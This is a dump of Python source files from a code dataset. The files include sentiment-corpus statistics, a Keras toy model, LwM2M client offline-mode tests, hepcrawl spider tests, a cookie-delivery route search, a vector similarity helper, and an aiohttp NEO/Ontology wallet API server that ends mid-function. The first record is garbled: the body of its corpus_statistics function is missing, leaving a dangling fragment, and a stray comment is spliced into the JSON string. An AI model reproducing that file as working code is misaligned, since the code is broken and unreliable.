+{"seq_id":"645932446","text":"from sentiment.tass import InterTASSReader\nimport os\nfrom collections import Counter, defaultdict as dc\nfrom pprint import pprint\n\ncategories = [\"CR\", \"ES\", \"PE\"]\nroot_path = \"InterTASS\"\nsuffix = \"train-tagged.xml\"\n\n\ndef count_tweets(path):\n reader = InterTASSReader(path)\n dist = Counter(reader.y())\n return dict(dist), sum(dist.values())\n\n
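# Sketch of count_tweets' return shape (numbers are made up; InterTASS\n# polarity labels are typically P, N, NEU and NONE):\n#   count_tweets(path) -> ({'P': 317, 'N': 416, 'NEU': 133, 'NONE': 139}, 1005)\n\n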
corpus))\n return dict(statistics)\n\n\nif __name__ == '__main__':\n pprint(corpus_statistics(root_path, categories))\n","sub_path":"sentiment/scripts/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"76913313","text":"import numpy as np\n\nx = np.array([range(100), range(311,411)])\ny = np.array([range(501,601), range(711,811)])\n\nx=np.transpose(x)\ny=np.transpose(y)\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(\n x,y, random_state = 66, test_size = 0.4 # test_size = 0.4: carve off 40% for the test set.\n)\nx_test, x_val, y_test, y_val = train_test_split(\n x_test, y_test, random_state = 66, test_size = 0.5\n)\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nmodel = Sequential()\n\n# Build the model\n# model.add(Dense(100, input_dim = 1, activation = 'relu'))\nmodel.add(Dense(100, input_shape = (2,), activation = 'relu'))\nmodel.add(Dense(50))\nmodel.add(Dense(25))\nmodel.add(Dense(5))\nmodel.add(Dense(2))\n\nmodel.summary()\n\n# Train\nmodel.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\nmodel.fit(x_train, y_train,epochs = 100, batch_size = 1, validation_data=(x_val,y_val)) # train, validating with x_val/y_val \n\n# Evaluate and predict\nloss, acc = model.evaluate(x_test, y_test,batch_size = 1) \nprint('acc:',acc)\n\ny_predict = model.predict(x_test)\nprint(y_predict)\n\n# Compute RMSE\nfrom sklearn.metrics import mean_squared_error\ndef RMSE(y_test, y_predict):\n return np.sqrt(mean_squared_error(y_test, y_predict)) # root of the mean squared difference between the two results.\nprint('RMSE:', RMSE(y_test, y_predict)) # should be 0.001 or less\n# R2\nfrom sklearn.metrics import r2_score\nr2_y_predict = r2_score(y_test, y_predict)\nprint('R2:', r2_y_predict) # higher is better.","sub_path":"keras01/keras11_mip.py","file_name":"keras11_mip.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"382480409","text":"import sys\n\n\nlastIndex = -1\ni = 0\nfor letter in sys.argv[1]:\n\n index = sys.argv[1].find(sys.argv[2],i)\n\n if index != lastIndex and index != -1:\n lastIndex = index\n print(index+1)\n\n i += 1\n","sub_path":"SUBS/subs.py","file_name":"subs.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"409010828","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2017-2018 AVSystem \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport socket\n\nfrom framework.lwm2m_test import *\n\nOFFLINE_INTERVAL = 4\n\n\nclass OfflineWithDtlsResumeTest(test_suite.Lwm2mDtlsSingleServerTest):\n def runTest(self):\n # Create object\n req = Lwm2mCreate('/1337', TLV.make_instance(instance_id=0).serialize())\n self.serv.send(req)\n self.assertMsgEqual(Lwm2mCreated.matching(req)(), self.serv.recv())\n\n # Force Update so that we won't have differing data models during exit-offline\n self.communicate('send-update')\n 
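# assertDemoUpdatesRegistration consumes the resulting Update message\n 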
self.assertDemoUpdatesRegistration(content=ANY)\n\n # Observe: Timestamp\n observe_req = Lwm2mObserve('/1337/0/0')\n self.serv.send(observe_req)\n\n timestamp_pkt = self.serv.recv()\n self.assertMsgEqual(Lwm2mContent.matching(observe_req)(), timestamp_pkt)\n\n # now enter offline mode\n self.communicate('enter-offline')\n\n # if we were not fast enough, one more message might have come;\n # we try to support both cases\n try:\n timestamp_pkt = self.serv.recv(timeout_s=1)\n except socket.timeout:\n pass\n\n # now no messages shall arrive\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=OFFLINE_INTERVAL)\n\n # exit offline mode\n self.communicate('exit-offline')\n\n # client reconnects with DTLS session resumption\n self.assertDtlsReconnect()\n\n notifications = 0\n while True:\n try:\n timestamp_pkt = self.serv.recv(timeout_s=0.2)\n self.assertEqual(timestamp_pkt.token, observe_req.token)\n notifications += 1\n except socket.timeout:\n break\n self.assertGreaterEqual(notifications, OFFLINE_INTERVAL - 1)\n self.assertLessEqual(notifications, OFFLINE_INTERVAL + 1)\n\n # Cancel Observe\n req = Lwm2mObserve('/1337/0/0', observe=1)\n self.serv.send(req)\n timestamp_pkt = self.serv.recv()\n self.assertMsgEqual(Lwm2mContent.matching(req)(), timestamp_pkt)\n\n # now no messages shall arrive\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=2)\n\n\nclass OfflineWithReregisterTest(test_suite.Lwm2mDtlsSingleServerTest):\n LIFETIME = OFFLINE_INTERVAL - 1\n\n def setUp(self):\n super().setUp(lifetime=OfflineWithReregisterTest.LIFETIME)\n\n def runTest(self):\n self.communicate('enter-offline')\n\n # now no messages shall arrive\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=OFFLINE_INTERVAL)\n\n self.communicate('exit-offline')\n\n # Register shall now come\n self.assertDtlsReconnect()\n self.assertDemoRegisters(lifetime=OfflineWithReregisterTest.LIFETIME)\n\n\nclass OfflineWithSecurityObjectChange(test_suite.Lwm2mDtlsSingleServerTest):\n def runTest(self):\n self.communicate('enter-offline')\n # Notify anjay that Security Object Resource changed\n self.communicate('notify /0/0/0')\n # This should not reload sockets\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=1)\n\n # Notify anjay that Security Object Instances changed\n self.communicate('notify /0')\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=1)\n\n self.communicate('exit-offline')\n self.assertDtlsReconnect()\n\n\nclass OfflineWithReconnect(test_suite.Lwm2mDtlsSingleServerTest):\n def runTest(self):\n self.communicate('enter-offline')\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=OFFLINE_INTERVAL)\n self.communicate('reconnect')\n self.assertDtlsReconnect()\n\n\nclass OfflineWithoutDtlsTest(test_suite.Lwm2mSingleServerTest):\n def runTest(self):\n self.communicate('enter-offline')\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=OFFLINE_INTERVAL)\n self.communicate('exit-offline')\n self.assertDemoRegisters()\n\n\nclass OfflineWithRegistrationUpdateSchedule(test_suite.Lwm2mDtlsSingleServerTest):\n def runTest(self):\n self.communicate('enter-offline')\n self.communicate('send-update 0')\n with self.assertRaises(socket.timeout):\n pkt = self.serv.recv(timeout_s=1)\n\n self.communicate('exit-offline')\n self.assertDtlsReconnect()\n # no Update because it doesn't work while in offline 
mode\n","sub_path":"test/integration/suites/default/offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224055478","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of hepcrawl.\n# Copyright (C) 2015, 2016, 2017 CERN.\n#\n# hepcrawl is a free software; you can redistribute it and/or modify it\n# under the terms of the Revised BSD License; see LICENSE file for\n# more details.\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pytest\n\nfrom scrapy.selector import Selector\n\nfrom hepcrawl.spiders import phenix_spider\n\nfrom hepcrawl.testlib.fixtures import (\n fake_response_from_file,\n fake_response_from_string,\n get_node,\n )\n\n\n@pytest.fixture\ndef record():\n \"\"\"Return results generator from the Alpha spider.\"\"\"\n spider = phenix_spider.PhenixSpider()\n response = fake_response_from_file('phenix/test_1.html')\n selector = Selector(response, type='html')\n nodes = selector.xpath('//%s' % spider.itertag)\n\n parsed_item = spider.parse_node(response, nodes[0])\n assert parsed_item\n assert parsed_item.record\n\n return parsed_item.record\n\n\n@pytest.fixture\ndef non_thesis():\n \"\"\"Return a heprecord for a Master's thesis (should be None as we don't\n want them).\"\"\"\n spider = phenix_spider.PhenixSpider()\n body = \"\"\"\n
    <ul>\n    <li>\n    M.Sc. Author:\n    \"This is an Master's thesis, not a PhD\", M.Sc. thesis at Master Science University, 2016,\n    </li>\n    </ul>
\n \"\"\"\n response = fake_response_from_string(body)\n node = get_node(spider, '//li', text=body)\n return spider.parse_node(response, node)\n\n\ndef test_non_thesis(non_thesis):\n \"\"\"Test MSc thesis skipping.\"\"\"\n assert non_thesis is None\n\n\ndef test_title(record):\n \"\"\"Test extracting title.\"\"\"\n title = \"MEASUREMENT OF THE DOUBLE HELICITY ASYMMETRY IN INCLUSIVE $\\pi^{0}$ PRODUCTION IN POLARIZED PROTON-PROTON COLLISIONS AT $\\sqrt{s}$ = 510 GeV\"\n assert 'title' in record\n assert record['title'] == title\n\n\ndef test_date_published(record):\n \"\"\"Test extracting date_published.\"\"\"\n date_published = \"2015\"\n assert 'date_published' in record\n assert record['date_published'] == date_published\n\n\ndef test_authors(record):\n \"\"\"Test authors.\"\"\"\n authors = [\"Guragain, Hari\"]\n affiliation = \"Georgia State University\"\n\n assert 'authors' in record\n assert len(record['authors']) == len(authors)\n\n # here we are making sure order is kept\n for index, name in enumerate(authors):\n assert record['authors'][index]['full_name'] == name\n assert affiliation in [\n aff['value'] for aff in record['authors'][index]['affiliations']\n ]\n\n\ndef test_pdf_link(record):\n \"\"\"Test pdf link(s)\"\"\"\n files = \"http://www.phenix.bnl.gov/phenix/WWW/talk/archive/theses/2015/Guragain_Hari-DISSERTATION.pdf\"\n assert 'additional_files' in record\n assert record['additional_files'][0]['url'] == files\n","sub_path":"tests/unit/test_phenix.py","file_name":"test_phenix.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"218945058","text":"\ndef is_id_correct(id_no, buys, boxs):\n left = boxs\n ret_item = (False,-1,-1)\n for i in range(id_no,n_houses):\n left = left - buys[i]\n if left < 0:\n pass\n #print(id_no+1,i+1,\" Not Okay \",left)\n if left == 0:\n #print(id_no+1,i+1,\" OKAY \",left)\n\n ret_item = (True,id_no+1,i+1)\n return ret_item\ndef search_all_possibilities(n_houses,n_boxes,n_buys):\n for i in range(n_houses):\n deal = is_id_correct(i, buys=n_buys, boxs=n_boxes)\n if deal[0] is True:\n print(f\"\\nStart your route at house {deal[1]} and go to house {deal[2]} to deliver {n_boxes} boxes of girl scout cookies.\\n\")\n break\n if deal[0] is False:\n print(\"It is impossible to deliver any cookies without making a partial order.\")\n\nif __name__=='__main__':\n \"\"\"\n Data should be loaded into the file named datafile.txt as coded.\n \"\"\"\n with open('datafile.txt','r') as file:\n data = file.read().split('\\n')\n if data[-1]=='': data=data[:-1]\n data = [int(i) for i in data]\n\n n_houses = data[0]\n n_boxes = data[1]\n n_buys = data[2:]\n if len(n_buys) != n_houses:\n print(\"Data has errors, please check\")\n exit()\n\n # Testing\n # n_houses = 9\n # n_boxes = 12\n # n_buys = [4,4,4,3,3,3,5,4,4]\n search_all_possibilities(n_houses,n_boxes,n_buys)\n","sub_path":"routesearch.py","file_name":"routesearch.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"454367543","text":"import pandas as pd\nimport numpy as np\nimport dask.array as da\ndef normalize(v, axis=-1, order=2):\n l2 = np.linalg.norm(v, ord = order, axis=axis, keepdims=True)\n l2[l2==0] = 1\n return v/l2\n\nclass VectorProcessor:\n\n def __init__(self):\n self.vector = []\n self.indexes = []\n self.da_array = da.array([])\n self.concrete_array = []\n self.word_table = []\n\n def read_csv(self, path):\n 
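# parse the CSV with pandas and keep the DataFrame on the instance\n 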
self.df = pd.read_csv(path)\n\n def set_vector(self, vectors):\n self.vector = vectors\n\n def set_da_array(self, array):\n self.da_array = array\n\n def set_concrete_array(self, array):\n self.concrete_array = array\n\n def set_word_indexes(self, indexes):\n self.indexes = indexes\n\n def cos_sim_da(self, v1, v2):\n v2 = da.reshape(v2, (v2.shape[1], 1))\n result = da.dot(v1, v2) / (da.linalg.norm(v1) * da.linalg.norm(v2))\n print('computing cos similar...')\n return result.compute()[0][0]\n\n def cos_sim_arr(self, v1, v2):\n print(v1, v2)\n v1 = np.array(v1)\n v2 = np.array(v2)\n # v1[v1<10]=0\n # v2[v2<10]=0\n # index = 0\n # for i, v in enumerate(v1):\n # index = i\n # if v2[i] != v:\n # break\n \n # v1 = np.delete(v1, [0, index], 0)\n # v2 = np.delete(v2, [0, index], 0)\n # v1 = self.__extract_nonzero_array(v1)\n # v2 = self.__extract_nonzero_array(v2)\n \n # for i, v in enumerate(v1):\n # print(v, v2)\n \n v2 = np.reshape(v2, (v2.shape[0], 1))\n result = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))\n return result\n\n def __extract_nonzero_array(self, v):\n return v[v.nonzero()]\n\n def calc_sim_da(self, word_1, word_2):\n word_1_index = 0\n word_2_index = 0\n try:\n word_1_index = self.indexes.index(word_1)\n word_2_index = self.indexes.index(word_2)\n sim = self.cos_sim_da(\n da.take(self.da_array, [word_1_index]), \n da.take(self.da_array, [word_2_index])\n )\n print(sim)\n except KeyError:\n print(\"not found word\")\n \n def calc_sim_arr(self, word_1, word_2):\n word_1_index = 0\n word_2_index = 0\n try:\n word_1_index = self.indexes.index(word_1)\n word_2_index = self.indexes.index(word_2)\n sim = self.cos_sim_arr(\n self.word_table[word_1_index],\n self.word_table[word_2_index]\n )\n print(float(sim[0]))\n except KeyError:\n print(\"not found word\") ","sub_path":"vector_processor/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512065390","text":"import os\nimport json\nimport asyncio\nfrom coreweb import get, post, options\nfrom aiohttp import web\nfrom decimal import Decimal as D\nfrom pymongo import DESCENDING\nfrom binascii import hexlify, unhexlify\nfrom apis import APIValueError, APIResourceNotFoundError, APIError\nfrom tools import Tool, check_decimal, sci_to_str, big_or_little\nfrom assets import NEO, GAS, GLOBAL_TYPES\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nfrom dotenv import load_dotenv, find_dotenv\nload_dotenv(find_dotenv(), override=True)\nfrom ont_handlers import height_ont, block_ont, transaction_ont, get_ont_balance, address_ont, claim_ont, transfer_ont, ong, broadcast_ont, transfer_ont_options, ong_options, broadcast_ont_options\nfrom ont_handlers import assets as ONT_ASSETS\n\n\ndef valid_net(net, request):\n return net == request.app['net']\n\ndef valid_platform(platform):\n return platform in ['ios','android']\n\ndef valid_asset(asset):\n if len(asset) in [40,64]: return True\n return False\n\ndef valid_page_arg(index, length):\n try:\n index = int(index)\n except:\n return False, {'error':'wrong index'}\n try:\n length = int(length)\n except:\n return False, {'error':'wrong length'}\n if index <= 0: return False, {'error':'wrong index'}\n if length <= 0 or length>100: return False, {'error':'wrong length'}\n return True, {'index':index, 'length':length}\n\ndef get_asset_decimal(asset):\n if asset['type'] in GLOBAL_TYPES: return asset[\"precision\"]\n try:\n return int(asset['decimals'])\n 
except:\n return 8\n\nasync def get_rpc(request,method,params):\n async with request.app['session'].post(request.app['neo_uri'],\n json={'jsonrpc':'2.0','method':method,'params':params,'id':1}) as resp:\n if 200 != resp.status:\n logging.error('Unable to visit %s %s' % (request.app['neo_uri'], method))\n return '404'\n j = await resp.json()\n if 'error' in j.keys():\n logging.error('result error when %s %s' % (request.app['neo_uri'], method))\n return '404'\n return j['result']\n\nasync def send_raw_transaction(tx, request):\n async with request.app['session'].post(request.app['neo_uri'],\n json={'jsonrpc':'2.0','method':'sendrawtransaction','params':[tx],'id':1}) as resp:\n method = 'sendrawtransaction'\n if 200 != resp.status:\n logging.error('Unable to visit %s %s' % (request.app['neo_uri'], method))\n return False,'404'\n j = await resp.json()\n if 'error' in j.keys():\n logging.error('result error when %s %s' % (request.app['neo_uri'], method))\n return False, j['error']['message']\n return j['result'],''\n\nasync def get_nep5_asset_balance(request, address, asset, decimals=8):\n result = await get_rpc(request, 'invokefunction',\n [asset, \"balanceOf\", [{\"type\":\"Hash160\",\"value\":big_or_little(Tool.address_to_scripthash(address))}]])\n if result and \"HALT, BREAK\" == result[\"state\"]:\n hex_str = result['stack'][0]['value']\n if hex_str: return Tool.hex_to_num_str(hex_str, decimals)\n return '0'\n return '0'\n\nasync def get_multi_nep5_balance(request, address, assets):\n result = {}\n for asset in assets:\n try:\n asset['decimals'] = int(asset['decimals'])\n except:\n asset['decimals'] = 8\n nep5_result = await asyncio.gather(\n *[get_nep5_asset_balance(request, address, asset[\"id\"], asset['decimals']) for asset in assets])\n for i in range(len(assets)):\n result[assets[i]['id']] = nep5_result[i]\n return result\n\nasync def get_utxo(request, address, asset):\n if not asset.startswith('0x'): asset = '0x' + asset\n result = []\n cursor = request.app['db'].utxos.find({'address':address, 'asset':asset, 'spent_height':None})\n for doc in await cursor.to_list(None):\n doc['asset'] = doc['asset'][2:]\n doc['txid'] = doc['txid'][2:]\n result.append({'prevIndex':doc['index'],'prevHash':doc['txid'],'value':doc['value']})\n return result\n\nasync def get_global_asset_balance(request, address, asset):\n if not asset.startswith('0x'): asset = '0x' + asset\n utxo = await get_utxo(request, address, asset)\n return sci_to_str(str(sum([D(i['value']) for i in utxo])))\n\nasync def get_all_utxo(request, address):\n result = {}\n cursor = request.app['db'].utxos.find({'address':address,'spent_height':None})\n for doc in await cursor.to_list(None):\n asset = doc['asset'] = doc['asset'][2:]\n doc['txid'] = doc['txid'][2:]\n if asset not in result.keys():\n result[asset] = []\n result[asset].append({'prevIndex':doc['index'],'prevHash':doc['txid'],'value':doc['value']})\n return result\n\nasync def get_asset_state(request):\n result = await request.app['db'].state.find_one({'_id':'asset'})\n if not result: return -1\n return result['value']\n\nasync def get_all_global(request):\n result = []\n cursor = request.app['db'].assets.find({\"type\":{\"$in\":GLOBAL_TYPES}})\n for doc in await cursor.to_list(None):\n doc['id'] = doc['_id']\n del doc['_id']\n result.append(doc)\n return result\n\nasync def get_all_nep5(request):\n result = []\n cursor = request.app['db'].assets.find({'type':'NEP5'})\n for doc in await cursor.to_list(None):\n doc['id'] = doc['_id']\n del doc['_id']\n result.append(doc)\n 
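# sort by symbol; tokens without one default to 'zzz' and sink to the end\n 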
result.sort(key=lambda k:(k.get('symbol','zzz')))\n return result\n\nasync def get_all_ontology(request):\n result = []\n cursor = request.app['db'].assets.find({'type':'ONTOLOGY'})\n for doc in await cursor.to_list(None):\n doc['id'] = doc['_id']\n del doc['_id']\n result.append(doc)\n return result\n\nasync def get_all_asset(request):\n results = await asyncio.gather(\n get_asset_state(request),\n get_all_global(request),\n get_all_nep5(request),\n get_all_ontology(request))\n return {'state':results[0], 'GLOBAL':results[1], 'NEP5':results[2], 'ONTOLOGY':results[3]}\n\nasync def get_an_asset(id, request):\n return await request.app['db'].assets.find_one({'_id':id}) \n\n@get('/')\ndef index(request):\n return {'hello':'%s' % request.app['net'],\n 'GET':[\n '/',\n '/{net}/height',\n '/{net}/height/ont',\n '/{net}/block/{block}',\n '/{net}/block/ont/{block}',\n '/{net}/transaction/{txid}',\n '/{net}/transaction/ont/{txid}',\n '/{net}/claim/{address}',\n '/{net}/claim/ont/{address}',\n '/{net}/address/{address}',\n '/{net}/address/ont/{address}',\n '/{net}/asset?id={assetid}',\n '/{net}/history/{address}?asset={assetid}&index={index}&length={length}',\n ],\n 'POST':[\n '/{net}/gas',\n '/{net}/ong',\n '/{net}/transfer',\n '/{net}/transfer/ont',\n '/{net}/broadcast',\n '/{net}/broadcast/ont',\n ],\n 'ref':{\n 'How to transfer?':'http://note.youdao.com/noteshare?id=b60cc93fa8e8804394ade199c52d6274',\n 'How to claim GAS?':'http://note.youdao.com/noteshare?id=c2b09b4fa26d59898a0f968ccd1652a0',\n 'How to claim ONG?':'http://note.youdao.com/noteshare?id=96992980cb8b5c6210a5b79478b3111d',\n 'Source Code':'https://github.com/OTCGO/SYNC_NEO/',\n },\n }\n\n@get('/{net}/height')\nasync def height(net, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n return {'height':await request.app['redis'].get('height')}\n\n@get('/{net}/asset')\nasync def asset(net, request, *, id=0):\n if not valid_net(net, request): return {'error':'wrong net'}\n if 0 == id:\n return await get_all_asset(request)\n if id.startswith('0x'): id = id[2:]\n if not valid_asset(id): return {'error':'asset not exist'}\n r = await get_an_asset(id, request)\n if r: \n r['id'] = r['_id']\n del r['_id']\n return r\n return {'error':'asset not exist'}\n\n@get('/{net}/block/{block}')\nasync def block(net, block, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n try:\n b = int(block)\n except:\n return {'error':'wrong arg: {}'.format(block)}\n r = await request.app['db'].state.find_one({'_id':'height'})\n h = r['value']\n if b < 0 or b > h: return {'error':'not found'}\n r = await request.app['db'].blocks.find_one({'_id':b})\n r['index'] = r['_id']\n del r['_id']\n return r\n\n@get('/{net}/transaction/{txid}')\nasync def transaction(net, txid, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n return await get_rpc(request, 'getrawtransaction', [txid,1])\n\n@get('/{net}/address/{address}')\nasync def address(net, address, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n if not Tool.validate_address(address): return {'error':'wrong address'}\n result = {'_id':address,'balances':{}}\n nep5 = await get_all_nep5(request)\n aresult = await asyncio.gather(\n get_all_utxo(request,address),\n get_multi_nep5_balance(request, address, nep5),\n get_ont_balance(request, address))\n result['utxo'] = aresult[0]\n for k,v in result['utxo'].items():\n result['balances'][k] = sci_to_str(str(sum([D(i['value']) for i in v])))\n else:\n if NEO[2:] not in 
result['balances'].keys(): result['balances'][NEO[2:]] = \"0\"\n if GAS[2:] not in result['balances'].keys(): result['balances'][GAS[2:]] = \"0\"\n result['balances'].update(aresult[1])\n result['balances'][ONT_ASSETS['ont']['scripthash']] = aresult[2]['ont']\n result['balances'][ONT_ASSETS['ong']['scripthash']] = aresult[2]['ong']\n return result\n\n@get('/{net}/claim/{address}')\nasync def claim(net, address, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n if not Tool.validate_address(address): return {'error':'wrong address'}\n raw_utxo = []\n cursor = request.app['db'].utxos.find({'address':address,'asset':NEO, 'claim_height':None})\n for document in await cursor.to_list(None):\n raw_utxo.append(document)\n r = await request.app['db'].state.find_one({'_id':'height'})\n height = r['value'] + 1\n return await Tool.compute_gas(height, raw_utxo, request.app['db'])\n\n@get('/{net}/history/{address}')\nasync def history(net, address, request, *, asset=0, index=1, length=20):\n if not valid_net(net, request): return {'error':'wrong net'}\n if not Tool.validate_address(address): return {'error':'wrong address'}\n result,info = valid_page_arg(index, length)\n if not result: return info\n index, length = info['index'], info['length']\n skip_num = (index - 1) * length\n raw_utxo = []\n query = {'address':address}\n if 0 != asset:\n if asset.startswith('0x'): asset = asset[2:]\n if not valid_asset(asset): return {'error':'asset not exist'}\n if 64 == len(asset):\n query['asset'] = '0x' + asset\n else:\n query['asset'] = asset\n if 'asset' in query.keys() and 40 == len(query['asset']):\n cursor = request.app['db'].nep5history.find(query).sort('time', DESCENDING)\n else:\n cursor = request.app['db'].history.find(query).sort('time', DESCENDING)\n for document in await cursor.skip(skip_num).to_list(length=length):\n del document['_id']\n del document['address']\n raw_utxo.append(document)\n return {'result':raw_utxo}\n\n@get('/{net}/version/{platform}')\nasync def version(net, platform, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n platform = platform.lower()\n if not valid_platform(platform): return {'error':'wrong platform'}\n info = await request.app['db'].state.find_one({'_id':platform})\n if info:\n del info['_id']\n return {'result':True, 'version':info}\n return {'result':False, 'error':'not exist'}\n\n@post('/{net}/transfer')\nasync def transfer(net, request, *, source, dests, amounts, assetId, **kw):\n #params validation\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n if not Tool.validate_address(source): return {'result':False, 'error':'wrong source'}\n if assetId.startswith('0x'): assetId = assetId[2:]\n if not valid_asset(assetId): return {'result':False, 'error':'wrong assetId'}\n asset = await get_an_asset(assetId, request)\n if not asset: return {'result':False, 'error':'wrong assetId'}\n nep5_asset = global_asset = False\n if 40 == len(assetId): nep5_asset = True\n if 64 == len(assetId): global_asset = True\n ad = get_asset_decimal(asset)\n dests,amounts = dests.split(','), amounts.split(',')\n ld,la = len(dests), len(amounts)\n if ld != la: return {'result':False, 'error':'length of dests != length of amounts'}\n if nep5_asset and 1 != ld:\n return {'result':False, 'error':\"NEP5 token transfer only support One to One\"}\n if False in map(Tool.validate_address, dests): return {'error':'wrong dests'}\n try:\n amounts = [D(a) for a in amounts]\n except:\n return {'result':False, 'error':'wrong 
amounts'}\n if [a for a in amounts if a <= D(0)]: return {'error':'wrong amounts'}\n if False in [check_decimal(a,ad) for a in amounts]:\n return {'result':False, 'error':'wrong amounts'}\n #check balance && transaction\n tran_num = sum(amounts)\n if nep5_asset:\n balance = D(await get_nep5_asset_balance(request, source, assetId, ad))\n if balance < tran_num: return {'result':False, 'error':'insufficient balance'}\n transaction = Tool.transfer_nep5(assetId, source, dests[0], amounts[0], ad)\n result,msg = True,''\n if global_asset:\n utxo = await get_utxo(request, source, assetId)\n balance = sum([D(i['value']) for i in utxo])\n if balance < tran_num: return {'result':False, 'error':'insufficient balance'}\n items = [(dests[i],amounts[i]) for i in range(len(dests))]\n transaction,result,msg = Tool.transfer_global(source, utxo, items, assetId)\n if result:\n return {'result':True, 'transaction':transaction}\n return {'result':False, 'error':msg}\n\n@post('/{net}/gas')\nasync def gas(net, request, *, publicKey, **kw):\n #params validation\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n if not Tool.validate_cpubkey(publicKey): return {'result':False, 'error':'wrong publicKey'}\n #get gas\n address = Tool.cpubkey_to_address(publicKey)\n raw_utxo = []\n cursor = request.app['db'].utxos.find({'address':address,'asset':NEO, 'claim_height':None})\n for document in await cursor.to_list(None):\n raw_utxo.append(document)\n r = await request.app['db'].state.find_one({'_id':'height'})\n height = r['value'] + 1\n details = await Tool.compute_gas(height, raw_utxo, request.app['db'])\n tx,result,msg = Tool.claim_transaction(address, details)\n if result:\n return {'result':True, 'transaction':tx}\n return {'result':False, 'error':msg}\n\n@post('/{net}/new_contract')\nasync def new_contract(net, contract, address, request, **kw):\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n description = kw.get('description','')\n email = kw.get('email', '')\n author = kw.get('author', '')\n version = kw.get('version', '')\n name = kw.get('name', '')\n storage = kw.get('storage', '0')\n dynamic_invoke= kw.get('dynamic_invoke', '0')\n return_type = kw.get('return_type', 'void')\n parameter = kw.get('parameter', '')\n def str_to_hex_str(s):\n return hexlify(s.encode('utf8')).decode('utf8')\n tx = ''\n for k,v in {'description':description,\n 'email':email,\n 'author':author,\n 'version':version,\n 'name':name}.items():\n v = str_to_hex_str(v)\n if 0 == len(v):\n tx += '00'\n continue\n if len(v)/2>255: return {'result':False, 'error':'%s is too long' % k}\n tx += Tool.num_to_hex_str(len(v)//2) + v\n #use_storage && dynamic_invoke\n sys_fee = 0\n for k,v in {'storage':storage,\n 'dynamic_invoke':dynamic_invoke,\n }.items():\n if v not in ['0','1']: return {'result':False, 'error':'wrong %s,must 0 or 1' % k}\n else:\n if '0' == storage and '0' == dynamic_invoke:\n tx += '00'\n sys_fee = 90\n if '1' == storage and '0' == dynamic_invoke:\n tx += '51'\n sys_fee = 490\n if '0' == storage and '1' == dynamic_invoke:\n tx += '52'\n sys_fee = 590\n if '1' == storage and '1' == dynamic_invoke:\n tx += '53'\n sys_fee = 990\n #return_type\n return_dict = {\n 'signature':'00',\n 'boolean':'51',\n 'integer':'52',\n 'hash160':'53',\n 'hash256':'54',\n 'bytearray':'55',\n 'publickey':'56',\n 'string':'57',\n 'array':'60',\n 'interopinterface':'F0',\n 'void':'FF',\n }\n return_type = return_type.lower()\n if return_type not in return_dict.keys(): return {'result':False, 
'error':'wrong return type, must 0 or 1'}\n tx += return_dict[return_type]\n #parameter\n parameter_dict = {\n 'signature':'00',\n 'boolean':'01',\n 'integer':'02',\n 'hash160':'03',\n 'hash256':'04',\n 'bytearray':'05',\n 'publickey':'06',\n 'string':'07',\n 'array':'10',\n 'interopinterface':'F0',\n 'void':'FF',\n }\n parameter = parameter.split(',')\n parameter = list(filter(lambda i:i != '', parameter))\n if not parameter:\n tx += '00'\n else:\n if False in map(lambda x:x in parameter_dict.keys(), parameter):\n return {'result':False, 'error':'wrong parameter'}\n tx += Tool.num_to_hex_str(len(parameter))\n for p in parameter:\n tx += parameter_dict[p]\n #contract\n contract_len = len(contract)\n if 0 == contract_len or 1 == contract_len%2: return {'result':False, 'error':'wrong length of the contract'}\n contract_len = contract_len // 2\n if contract_len <= 0xFF:\n tx += '4c' + Tool.num_to_hex_str(contract_len) + contract\n elif contract_len <= 0xFFFF:\n tx += '4d' + Tool.num_to_hex_str(contract_len, 2) + contract\n else:\n tx += '4e' + Tool.num_to_hex_str(contract_len, 4) + contract\n tx += '68134e656f2e436f6e74726163742e437265617465'\n #check 